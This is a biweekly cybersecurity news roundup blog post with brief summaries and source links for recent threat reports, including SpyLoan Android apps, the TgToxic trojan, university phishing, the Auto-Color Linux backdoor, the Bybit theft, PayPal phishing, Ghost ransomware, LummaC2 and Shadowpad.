Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.
For more articles, check out our #onpatrol4malware blog.
Predatory app downloaded 100,000 times from Google Play Store steals data, uses it for blackmail
Source: Malwarebytes LABS
A malicious app claiming to be a financial management tool has been downloaded 100,000 times from the Google Play Store. The app— known as “Finance Simplified”—belongs to the SpyLoan family which specializes in predatory lending. Read more.
Android trojan TgToxic updates its capabilities
Source: Intel471
This new version of the trojan abused 25 community forums to host encrypted malware configurations. The actors created user accounts on these forums and embedded specific encrypted strings within the user profiles, serving as dead drop locations from which malware bots could retrieve the final command-and-control (C2) URL. Read more.
Phishing Campaigns Targeting Higher Education Institutions
Source: Google Cloud
These attacks exploit trust within academic institutions to deceive students, faculty, and staff, and have been timed to coincide with key dates in the academic calendar. The beginning of the school year, with its influx of new and returning students combined with a barrage of administrative tasks, as well as financial aid deadlines, can create opportunities for attackers to carry out phishing attacks. Read more.
Auto-Color: An Emerging and Evasive Linux Backdoor
Source: Unit42
Between early November and December 2024, Palo Alto Networks researchers discovered new Linux malware called Auto-color. We chose this name based on the file name the initial payload renames itself after installation. Once installed, Auto-color allows threat actors full remote access to compromised machines, making it very difficult to remove without specialized software. Read more.
The Bybit Incident: When Research Meets Reality
Source: CHECKPOINT
The log indicated that the AI engine identify anomality change with this transaction and categorize it as critical attack in real time. It was indicated that ByBit cold wallet got hacked, resulting in the theft of approximately $1.5 billion worth of digital assets, primarily in Ethereum tokens. This incident marks one of the largest thefts in the history of the digital asset industry. Read more.
Beware: PayPal “New Address” feature abused to send phishing emails
Source: BLEEPING COMPUTER
An ongoing PayPal email scam exploits the platform’s address settings to send fake purchase notifications, tricking users into granting remote access to scammers. The email includes the new address that was allegedly added to your PayPal account, a message claiming to be a purchase confirmation for a MacBook M4, and to call the enclosed PayPal number if you did not authorize the purchase. Read more.
Angry Likho: Old beasts in a new forest
Source: SECURE LIST
Angry Likho (referred to as Sticky Werewolf by some vendors) is an APT group we’ve been monitoring since 2023. It bears a strong resemblance to Awaken Likho, which we’ve analyzed before, so we classified it within the Likho malicious activity cluster. Read more.
FBI and CISA Warn of Ghost Ransomware: A Threat to Firms Worldwide
Source: HACK READ
FBI and CISA warn of Ghost ransomware, a China-based cyber threat targeting businesses, schools, and healthcare worldwide by exploiting software vulnerabilities. Read more.
LummaC2 malware distributed disguised as Total Commander Crack
Source: ASEC
ASEC discovered LummaC2 malware that is being distributed disguised as a tool called Total Commander. Total Commander is a file manager for Windows that supports various file formats and provides convenient overall file management, including copy and move functions, advanced search functions using strings within files, folder synchronization, and FTP/SFTP functions. Read more.
Updated Shadowpad Malware Leads to Ransomware Deployment
Source: TREND MICRO
Two recent incident response cases in Europe involved Shadowpad, a malware family connected to various Chinese threat actors. Our research suggested that this malware family had targeted at least 21 companies across 15 countries in Europe, the Middle East, Asia, and South America. Read more.